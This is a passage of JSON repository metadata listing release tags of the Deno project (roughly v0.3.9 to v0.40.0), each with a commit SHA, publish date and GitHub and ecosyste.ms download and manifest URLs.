0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste